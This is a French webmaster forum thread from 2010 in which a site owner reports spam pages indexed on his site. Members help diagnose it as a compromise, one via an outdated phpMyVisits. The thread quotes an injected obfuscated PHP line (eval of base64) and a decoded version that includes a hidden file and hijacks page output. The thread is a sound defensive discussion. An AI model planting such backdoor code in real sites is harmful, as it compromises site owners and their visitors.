une truc illicite a attaqué mon site

Règles du forum
Attention ce forum est destiné avant tout à ceux qui découvrent le référencement. Les membres qui auront l'amabilité de répondre à leurs questions sont priés de rester courtois, polis, indulgents, patients et pédagogues... Merci d'avance !

Par ailleurs, inutile d'utiliser ce forum uniquement pour obtenir des liens vers vos sites, les liens sont désactivés pour le référencement (nofollow).

Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 6:15

Bonjour
au passage sur mon compte google j'ai decouvri que je gagne un enorme nombre des visites sur des pages que j'ai pas crée
et ces pages sont référencés et ils ont un enorme nombre des backlinks de Pagerank elevé ce qui a transformé mon site vers un nid des visites illicites .
je suis bloké la je sais pas d'ou viens et le probléme et comment je peux l'enlever sachant que j'ai rien mis sur mon site sauf avant un mois j'avais un script d'un certain site (nom retiré par WRI...)
et j l'ai enlevé de mon index mais parfois je le trouve dans des autres pages c'est comme une maladie héréditaire .
vous pouvez m'aider svp a resoudre ces 2 problémes .


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 6:18

voila le code que je trouve sur tous mes pages php :
<?php /**/ eval ( base64_decode ( ' aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3ZpcnR1YWwvdGNoYXQtbGl2ZS5vcmcvaHRkb2NzL2FubnVhaXJlL2NsYXNzL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19' ) ) ; ?>
mon site est indiqué en cliquant sur le bouton www
Dernière édition par kyrien le Lun Fév 01, 2010 6:47, édité 1 fois.


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 6:45

je vous donne un peu des informations sur ces liens avec le nombre des backlinks calculés par google :


index.php/?cnr=earthquake+relief+fund
8 994
index.php/?cnr=hulu+on+ps3
8 788
index.php/?cnr=irs+mileage+rate+2009
8 670
index.php/?cnr=hulu+the+office
8 591
index.php/?cnr=drudge+report+health+care
8 586
index.php/?cnr=youtube+funny
8 580
index.php/?cnr=hulu+house
8 489
index.php/?cnr=earthquake+relief
8 414
index.php/?cnr=larry+platt+military+antiques
8 227
index.php/?cnr=larry+platt+antiques
7 944
index.php/?cnr=irs+refund
7 854
index.php/?cnr=earthquake+relief+efforts
7 698
index.php/?cnr=hulu+30+rock
7 688
index.php/?cnr=hulu+movies
7 518
index.php/?cnr=earthquake+relief+indonesia
7 503
index.php/?cnr=drudge+report
7 425
index.php/?cnr=drudge+report+rss
7 354
index.php/?cnr=larry+platt+philadelphia+magazine
7 333
index.php/?cnr=drudge+report+archives
7 319
index.php/?cnr=youtube
7 239
index.php/?cnr=2010+fashion+trends+colors
7 092
index.php/?cnr=youtube+downloader
6 903
index.php/?cnr=irs
6 665
index.php/?cnr=2010+fashion+trends+insider
5 881
index.php/?cnr=2010+fashion+trends+for+men
5 790
index.php/?cnr=larry+platt
5 778
index.php/?cnr=irs+phone+number
5 764
index.php/?cnr=2010+fashion+trends+spring
5 692
http://www.tchat-live.org/
4 509
index.php/?cnr=hulu+family+guy
1 273
index.php/?cnr=2010+fashion+trends+forecast
1 226


MaBoul
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 30
Inscription: 18 Jan 2008

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 7:02

Bonjour,

Est-ce que tu utilises php my visits ?

epsilon74
WRInaute occasionnel
WRInaute occasionnel
 
Messages: 444
Inscription: 17 Mar 2004

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 8:23

ton site a tout simplement été infecté, et tes visiteurs aussi au passage si ils n'ont pas un bon antivirus à jour.
maintenant d'où ça vient ??? faille dans un de tes script (courant dans les script de tchat), pc de travail infecté et comptes ftp récupéré...

forummp3
WRInaute passionné
WRInaute passionné
 
Messages: 1982
Inscription: 8 Fév 2004

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 10:23

alors, c'est soit une faille dans tes scripts, soit un spyware/virus sur ton ordinateur qui a récupéré les mdp ftp sur ton logiciel ftp.

Fait un scan antivirus/spyware pour voir si tu trouve quelque chose, ensuite, tu re-uploader les bon fichier sans le javascript malware, et ensuite tu change le mdp ftp si tu peux, et finalement tu met tous tes fichiers et dossiers sur le serveur avec les droits 555, comme cela il sera impossible d'ecraser ou de remplacer les fichiers, tu sera tranquil le temps de chercher une eventuelle faille (si t'as les competences).

Mais avant, essaye de voir dans les logs serveur si tu vois quelque chose, pour t'aider, regarde la date et l'heure ou le fichier a été modifié, comme ca tu regarde les logs a cette date.
Si t'as un serveur dédié, regarde si personne à part toi s'est connecté au serveur.

sypsyp
WRInaute discret
WRInaute discret
 
Messages: 181
Inscription: 10 Juil 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 10:39

tu utilise spip ?


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 11:11

merci les gars


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 11:12

sypsyp a écrit:tu utilise spip ?

non


kyrien
WRInaute discret
WRInaute discret
 
Messages: 70
Inscription: 23 Mar 2009

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 11:12

MaBoul a écrit:Bonjour,

Est-ce que tu utilises php my visits ?

oui


loran750
WRInaute passionné
WRInaute passionné
 
Messages: 2247
Inscription: 15 Mar 2005

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 11:18

Très bien. Alors jette un oeil sur leur site officiel

- 1/ il faut le mettre à jour en version 2.4
- 2/ si tu veux le garder, c'est too bad d'autant plus qu'ils ont refondu l'application en une nouvelle qui s'appelle Piwik et qui semble superbe.

Voilà. Tu dois upgrader en piwik.


saypee
WRInaute accro
WRInaute accro
 
Messages: 2859
Inscription: 7 Mai 2005

Re: une truc illicite a attaqué mon site

Message le Lun Fév 01, 2010 12:15

Ce ne sont pas les recherches qui sont indexées tout simplement ?


webMCC
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 3
Inscription: 28 Mai 2009

Re: une truc illicite a attaqué mon site

Message le Mar Fév 09, 2010 9:27

Hello

Le code que tu mentionnes au dessus est encodé en base 64.
Décodé, cela correspond à l'exploitation d'une faille fckEditor situé dans : tchat-live.org/htdocs/annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php
==
Code: Tout sélectionner
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])) {
    $GLOBALS['mfsn']='/var/www/virtual/tchat-live.org/htdocs/annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';
    if(file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml')&&function_exists('dgobh')) {
            ob_start('dgobh');
        }
    }   
}

==
Un bon nettoyage en profondeur s'impose...

Neillys
WRInaute occasionnel
WRInaute occasionnel
 
Messages: 474
Inscription: 15 Juil 2008

Re: une truc illicite a attaqué mon site

Message le Mar Fév 09, 2010 11:25

kyrien a écrit:voila le code que je trouve sur tous mes pages php :
<?php /**/ eval ( base64_decode ( ' gnangnanagngnnangan ) ) ; ?>
mon site est indiqué en cliquant sur le bouton www


Tu es chez Ovh ?


Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités